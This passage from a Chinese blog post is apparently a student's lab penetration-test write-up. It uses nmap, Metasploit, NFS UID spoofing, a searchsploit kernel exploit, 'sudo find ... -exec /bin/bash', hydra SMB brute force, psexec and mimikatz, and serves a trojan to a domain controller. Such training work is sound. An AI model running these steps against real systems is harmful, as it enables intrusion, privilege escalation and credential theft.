                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2070.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2071.png"
                      alt="Untitled"
                ></p>
<h3 id="16、flag16"><a href="#16、flag16" class="headerlink" title="16、flag16"></a>16、flag16</h3><p>使用nmap进行扫描，proxychains nmap -sTV -Pn 192.168.100.30 -p1-65535 -n -open，发现了大量的属于Hadoop和Jetty的端口及服务</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2072.png"
                      alt="Untitled"
                ></p>
<p>监听6666端口</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2073.png"
                      alt="Untitled"
                ></p>
<p>在终端中执行curl命令</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2074.png"
                      alt="Untitled"
                ></p>
<p>构造json文件1.json，提交任务，执行命令，监听后获取shell，且为root权限。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2075.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2076.png"
                      alt="Untitled"
                ></p>
<p>直接读取文件，获取flag16</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag16&#123;5486ef0e33d7ec34&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2077.png"
                      alt="Untitled"
                ></p>
<h3 id="17、flag17"><a href="#17、flag17" class="headerlink" title="17、flag17"></a>17、flag17</h3><p>使用msf中的portscan对192.168.100.0&#x2F;24网络进行扫描</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2078.png"
                      alt="Untitled"
                ></p>
<p>使用ssh进行连接，查看是否存在nfs客户端工具</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2079.png"
                      alt="Untitled"
                ></p>
<p>使用showmount命令来查看nfs的导出目录,同时进行挂载</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2080.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2081.png"
                      alt="Untitled"
                ></p>
<p>没有权限读取flag，因此伪造文件所有者的uid来欺骗NFS服务器，创建一个uid为500的用户user1，创建好目录后将此目录赋予user1用户权限chown -R 500:500 &#x2F;home&#x2F;user1</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2082.png"
                      alt="Untitled"
                ></p>
<p>再次进入&#x2F;mnt&#x2F;user1目录，读取flag17</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag17&#123;38b0b845490faadc&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2083.png"
                      alt="Untitled"
                ></p>
<h3 id="18、flag18"><a href="#18、flag18" class="headerlink" title="18、flag18"></a>18、flag18</h3><p>先在本机的user1目录中创建.ssh目录，为&#x2F;mnt&#x2F;user1目录中创建.ssh目录，将生成的id_rsa.pub复制到目录主机user1用户的ssh配置目录中。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2084.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2085.png"
                      alt="Untitled"
                ></p>
<p>更改权限，使用kali中的searchsploit命令搜索，将此文件复制到&#x2F;mnt&#x2F;user1&#x2F;目录下，再用user1免密登录到192.168.100.50，编译此c文件，gcc 9545.c -o exp，将文件添加可执行权限，chmod +x exp，执行此文件.&#x2F;exp 执行提权，获取flag18</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag18&#123;71cd5d36e8c32175&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2086.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2087.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2088.png"
                      alt="Untitled"
                ></p>
<h3 id="19、flag19"><a href="#19、flag19" class="headerlink" title="19、flag19"></a>19、flag19</h3><div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag19&#123;33407fdc8ce55aa1&#125;</span><br></pre></td></tr></table></figure></div>

<p>使用msf中的portscan模块，然后指定192.168.100.0&#x2F;24网络扫描</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2089.png"
                      alt="Untitled"
                ></p>
<p>使用爆破出来的密码进行登录，在终端中输入如下命令，然后读取&#x2F;home&#x2F;user1目录下的flag内容。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2090.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2091.png"
                      alt="Untitled"
                ></p>
<h3 id="20、flag20"><a href="#20、flag20" class="headerlink" title="20、flag20"></a>20、flag20</h3><p>输入密码后，查询出user1可以通过sudo命令执行find，则存在提权的可能性，输入命令：sudo find &#x2F; -name ls -exec &#x2F;bin&#x2F;bash ;</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2092.png"
                      alt="Untitled"
                ></p>
<p>读取&#x2F;root目录下的flag，获取flag20</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag20&#123;1f9af0fb69497927&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2093.png"
                      alt="Untitled"
                ></p>
<h3 id="21、flag21"><a href="#21、flag21" class="headerlink" title="21、flag21"></a>21、flag21</h3><p>为msf添加路由之后，使用Msf的portscan模块进行扫描</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2094.png"
                      alt="Untitled"
                ></p>
<p>使用administrator作为用户名进行爆破，密码使用&#x2F;root目录下的password-top1000.txt，在<br>终端中输入：proxychains hydra -l administrator -P &#x2F;root&#x2F;password-top1000.txt 192.168.8.94 smb -V。因此获取密码，即获取flag21.</p>
<p>flag21{<a class="link"   target="_blank" rel="noopener" href="http://1234.com/" >1234.com <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>}</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2095.png"
                      alt="Untitled"
                ></p>
<h3 id="22、flag22"><a href="#22、flag22" class="headerlink" title="22、flag22"></a>22、flag22</h3><p>从上面任务已经获取了administrator用户的密码，可以使用msf中的psexec模块对windows机器进行攻击</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2096.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2097.png"
                      alt="Untitled"
                ></p>
<p>切换目录到c盘目录下，读取flag22</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag22&#123;7c043d4b5b12055c&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2098.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2099.png"
                      alt="Untitled"
                ></p>
<h3 id="23、flag23"><a href="#23、flag23" class="headerlink" title="23、flag23"></a>23、flag23</h3><p>执行mimikatz.exe</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%20100.png"
                      alt="Untitled"
                ></p>
<p>查看返回结果可以得到当前登录了一个域用户eviluser，因此获得flag23</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag23&#123;1qaz2wsx!QAZ@WSX&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%20101.png"
                      alt="Untitled"
                ></p>
<h3 id="24、flag24"><a href="#24、flag24" class="headerlink" title="24、flag24"></a>24、flag24</h3><p>新建一个终端，然后确定当前目录位置，因为接下来要在此目录搭建简易web服务器，然后让域控到这个目录中下载生成的木马文件。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%20102.png"
                      alt="Untitled"
                ></p>
<p>在当前目录中搭建简易web服务器,然后重新启动一个msfconsole终端.</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%20103.png"
                      alt="Untitled"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%20104.png"
                      alt="Untitled"
                ></p>
<p>然后使用前面获取的192.168.8.94的shell输入如下命令,</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%20105.png"
                      alt="Untitled"
                ></p>
<p>直接查看c盘根目录中的获得flag24即可，获取flag24</p>
<div class="highlight-container" data-rel="Html"><figure class="iseeu highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag24&#123;fb547ec167bc8389&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%20106.png"
                      alt="Untitled"
                ></p>

        </div>

        
            <div class="post-copyright-info">
                <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> </li>
        <li><strong>Author:</strong> Luxf1y</li>
        <li><strong>Created at
                :</strong> 2023-09-08 17:28:31</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2023-09-08 09:26:14
            </li>
        
        <li>
            <strong>Link:</strong> https://redefine.ohevan.com/2023/09/08/暑期实训/
        </li>
        <li>
            <strong>
                License:
            </strong>
            
            This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">CC BY-NC-SA 4.0</a>.
            

        </li>
    </ul>
</div>

            </div>
        

        

        

        
            <div class="article-nav">
                
                
                    <div class="article-next">
                        <a class="next"
                        rel="next"
                        href="/2023/09/08/hexo-new-blog-test/"
                        >
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">hexo new blog test</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        


        
            <div class="comment-container">
                <div class="comments-container pjax">
    <div id="comment-anchor"></div>
    <div class="comment-area-title">
        <i class="fa-solid fa-comments"></i>&nbsp;Comments
    </div>
    

        
            
 
    <div id="waline"></div>
    <script type="module"  data-swup-reload-script>
        import { init } from 'https://evan.beee.top/js/waline.mjs';

        function loadWaline() {
            init({
                el: '#waline',
                serverURL: 'https://example.example.com',
                lang: 'zh-CN',
                dark: 'body[class~="dark-mode"]',
                requiredMeta: ['nick','mail'], // cannot customize by theme config, change it yourself
            });
        }

        if ('true') {
            const loadWalineTimeout = setTimeout(() => {
                loadWaline();
                clearTimeout(loadWalineTimeout);
            }, 1000);
        } else {
            window.addEventListener('DOMContentLoaded', loadWaline);
        }
        
    </script>



        
    
</div>

            </div>
        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title"></div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD"><span class="nav-text">暑期实训</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1%E3%80%81flag1"><span class="nav-text">1、flag1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2%E3%80%81flag2"><span class="nav-text">2、flag2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3%E3%80%81flag3"><span class="nav-text">3、flag3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4%E3%80%81flag4"><span class="nav-text">4、flag4</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5%E3%80%81flag5"><span class="nav-text">5、flag5</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6%E3%80%81flag6"><span class="nav-text">6、flag6</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7%E3%80%81flag7"><span class="nav-text">7、flag7</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8%E3%80%81flag8"><span class="nav-text">8、flag8</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#9%E3%80%81flag9"><span class="nav-text">9、flag9</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#10%E3%80%81flag10"><span class="nav-text">10、flag10</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#11%E3%80%81flag11"><span class="nav-text">11、flag11</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#12%E3%80%81flag12"><span class="nav-text">12、flag12</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#13%E3%80%81flag13"><span class="nav-text">13、flag13</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#14%E3%80%81flag14"><span class="nav-text">14、flag14</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#15%E3%80%81flag15"><span class="nav-text">15、flag15</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#16%E3%80%81flag16"><span class="nav-text">16、flag16</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#17%E3%80%81flag17"><span class="nav-text">17、flag17</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#18%E3%80%81flag18"><span class="nav-text">18、flag18</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#19%E3%80%81flag19"><span class="nav-text">19、flag19</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#20%E3%80%81flag20"><span class="nav-text">20、flag20</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#21%E3%80%81flag21"><span class="nav-text">21、flag21</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#22%E3%80%81flag22"><span class="nav-text">22、flag22</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#23%E3%80%81flag23"><span class="nav-text">23、flag23</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#24%E3%80%81flag24"><span class="nav-text">24、flag24</span></a></li></ol></li></ol></li></ol>

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2023&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">Luxf1y</a>
        </div>
        
            <script data-swup-reload-script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.4.4</a></span>
        </div>
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="go-comment">
                <i class="fa-regular fa-comments"></i>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-expand-width flex justify-center items-center">
            <i class="fa-regular fa-expand"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    

</main>


    
<script src="/js/libs/Swup.min.js"></script>

<script src="/js/libs/SwupSlideTheme.min.js"></script>

<script src="/js/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/libs/SwupScrollPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
        ],
        containers: ["#swup"],
    });

    swup.hooks.on("page:view", () => {
        Global.refresh();
    });

    // if (document.readyState === "complete") {
    //
    // } else {
    //     document.addEventListener("DOMContentLoaded", () => init());
    // }
</script>






<script src="/js/utils.js" type="module"></script>

<script src="/js/main.js" type="module"></script>

<script src="/js/layouts/navbarShrink.js" type="module"></script>

<script src="/js/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/layouts/categoryList.js" type="module"></script>





    
<script src="/js/tools/codeBlock.js"></script>




    
<script src="/js/layouts/lazyload.js"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js"></script>







<div class="post-scripts" data-swup-reload-script>
    
        
<script src="/js/libs/anime.min.js"></script>

        
<script src="/js/tools/tocToggle.js" type="module"></script>

<script src="/js/layouts/toc.js" type="module"></script>

<script src="/js/plugins/tabs.js" type="module"></script>

    
</div>


</body>
</html>
